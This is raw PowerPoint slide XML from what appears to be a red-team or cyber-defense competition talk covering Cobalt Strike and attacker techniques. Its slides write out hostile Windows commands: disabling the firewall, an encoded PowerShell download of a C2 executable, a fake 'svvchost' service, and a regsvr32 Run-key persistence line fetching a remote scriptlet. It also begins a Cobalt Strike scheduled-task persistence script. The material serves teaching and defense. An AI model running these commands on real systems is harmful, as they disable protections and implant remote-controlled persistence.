                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> state off </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> state off </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -exec bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cABvAHcAZQByAHMAaABl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download C2C exe from Inter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7. sc.exe create "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svvchost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= "c:\temp\svvchost.exe" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sc.exe start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svvchost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> add(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "start" /d "regsvr32 /u /s /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.wingtiptoys.com/stext.sct scrobj.dll" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>/f </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BDC0046-3DBF-4DB3-8853-9ED2D13ED989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="92468" y="6608582"/>
            <a:ext cx="4099388" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0"/>
              <a:t>Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F524E24-EB69-4CB2-962D-3CAAD60C18EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239819" y="1635502"/>
            <a:ext cx="3916873" cy="4683105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCAB3ADE-39ED-42A7-9CB3-099EA10982AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="92468" y="1532181"/>
            <a:ext cx="2238687" cy="876422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384080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E5F8FD-BFF9-42EF-8661-D66CFEC25FBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="1510301"/>
            <a:ext cx="8184662" cy="425951"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.nationalccdc.org/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F647CFE2-B291-472C-8AC9-831CBBA539D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who has heard of Collegiate Cyber Defense Competition (CCDC)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5B0028-1A4A-4680-A0AC-5553936110BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1936252"/>
            <a:ext cx="9144000" cy="4989550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1379461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My  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Techniques/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FC6A12-8EE9-4B57-A9E0-C5FCBEC6997C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1623318"/>
            <a:ext cx="9113178" cy="5097688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3224615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40E38E-4E96-4020-BFA5-10D1CBFDB9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> pg.12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CF27A0-657D-4CE2-90DA-D1DB843D6857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> simulation software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9C6FC21-50C3-4E98-AB31-5B495473411F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="671757" y="2141838"/>
            <a:ext cx="7555395" cy="4554079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5614E23B-A88D-47D4-BB14-7094ADD71E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8227152" y="6057230"/>
            <a:ext cx="629267" cy="628738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2231285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40E38E-4E96-4020-BFA5-10D1CBFDB9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> pg.12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CF27A0-657D-4CE2-90DA-D1DB843D6857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adversary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> simulation software.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5614E23B-A88D-47D4-BB14-7094ADD71E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8227152" y="6057230"/>
            <a:ext cx="629267" cy="628738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-70340" y="-97582"/>
            <a:ext cx="9331718" cy="6955582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="271768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40E38E-4E96-4020-BFA5-10D1CBFDB9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777760" y="6057229"/>
            <a:ext cx="8078659" cy="411171"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Reference: https://github.com/harleyQu1nn/AggressorScripts/tree/master/Persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CF27A0-657D-4CE2-90DA-D1DB843D6857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456304" y="1633728"/>
            <a:ext cx="4400115" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternal-Killer.cna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mass-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dcsync</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilverTickets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777760" y="1503644"/>
            <a:ext cx="3467584" cy="4553585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456303" y="3116327"/>
            <a:ext cx="4400115" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>#User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Schtasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>#Author: @r3dQu1nn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>#Runs as current user for the selected beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>#Meant for quick user level persistence upon initial access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>#Thanks to @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>noone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>bluescreenofjeff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> for help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>persistUserSchtasks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	$bid = $1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>$dialog = dialog("User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
